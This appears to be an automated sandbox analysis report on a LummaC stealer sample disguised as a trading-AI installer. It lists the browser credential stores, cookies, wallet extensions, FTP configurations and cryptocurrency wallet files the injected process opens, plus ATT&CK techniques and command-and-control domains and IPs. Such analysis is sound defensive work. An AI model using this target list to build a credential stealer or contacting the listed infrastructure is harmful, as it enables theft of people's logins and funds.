      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Spearphishing Link      		31
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		2
      OS Credential Dumping      		2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		1
      Scheduled Task/Job      		1
      Access Token Manipulation      		3
      Obfuscated Files or Information      		LSASS Memory3
      File and Directory Discovery      		Remote Desktop Protocol3
      Data from Local System      		21
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts12
      Command and Scripting Interpreter      		Logon Script (Windows)312
      Process Injection      		1
      Software Packing      		Security Account Manager47
      System Information Discovery      		SMB/Windows Admin Shares1
      Screen Capture      		3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Scheduled Task/Job      		Login Hook1
      Scheduled Task/Job      		1
      DLL Side-Loading      		NTDS241
      Security Software Discovery      		Distributed Component Object Model2
      Clipboard Data      		114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud Accounts1
      PowerShell      		Network Logon ScriptNetwork Logon Script1
      Masquerading      		LSA Secrets12
      Virtualization/Sandbox Evasion      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Virtualization/Sandbox Evasion      		Cached Domain Credentials2
      Process Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Access Token Manipulation      		DCSync2
      System Owner/User Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
      Process Injection      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543888 Sample: XS_Trade_AI-newest_release_.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 97 revordirecut.cyou 2->97 99 tinyurl.com 2->99 101 2 other IPs or domains 2->101 113 Suricata IDS alerts for network traffic 2->113 115 Found malware configuration 2->115 117 Sigma detected: Scheduled temp file as task from temp location 2->117 119 4 other signatures 2->119 11 taskshosts.exe 22 2->11         started        14 XS_Trade_AI-newest_release_.exe 2 2->14         started        16 taskshosts.exe 22 2->16         started        signatures3 process4 file5 75 C:\Users\user\AppData\...\unicodedata.pyd, PE32 11->75 dropped 77 C:\Users\user\AppData\Local\...\select.pyd, PE32 11->77 dropped 79 C:\Users\user\AppData\Local\...\python39.dll, PE32 11->79 dropped 89 17 other files (none is malicious) 11->89 dropped 19 taskshosts.exe 11->19         started        81 C:\Users\...\XS_Trade_AI-newest_release_.tmp, PE32 14->81 dropped 22 XS_Trade_AI-newest_release_.tmp 3 13 14->22         started        83 C:\Users\user\AppData\...\unicodedata.pyd, PE32 16->83 dropped 85 C:\Users\user\AppData\Local\...\select.pyd, PE32 16->85 dropped 87 C:\Users\user\AppData\Local\...\python39.dll, PE32 16->87 dropped 91 17 other files (none is malicious) 16->91 dropped 111 Found pyInstaller with non standard icon 16->111 25 taskshosts.exe 16->25         started        signatures6 process7 file8 121 Writes to foreign memory regions 19->121 123 Allocates memory in foreign processes 19->123 125 Injects a PE file into a foreign processes 19->125 27 ngentask.exe 19->27         started        69 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 22->69 dropped 71 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 22->71 dropped 73 C:\Users\user\AppData\...\DontSleep_x64.exe, PE32+ 22->73 dropped 127 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->127 31 XS_Trade_AI-newest_release_.exe 2 22->31         started        129 LummaC encrypted strings found 25->129 34 ngentask.exe 25->34         started        signatures9 process10 dnsIp11 109 revordirecut.cyou 104.21.83.166, 443, 49743, 49744 CLOUDFLARENETUS United States 27->109 135 Query firmware table information (likely to detect VMs) 27->135 137 Tries to harvest and steal ftp login credentials 27->137 139 Tries to harvest and steal browser information (history, passwords, etc) 27->139 141 Tries to steal Crypto Currency Wallets 27->141 95 C:\Users\...\XS_Trade_AI-newest_release_.tmp, PE32 31->95 dropped 36 XS_Trade_AI-newest_release_.tmp 3 22 31->36         started        file12 signatures13 process14 dnsIp15 103 rentry.org 164.132.58.105, 443, 49734 OVHFR France 36->103 105 dl.jrdesklabs.com 135.181.116.240, 443, 49735, 49736 HETZNER-ASDE Germany 36->105 107 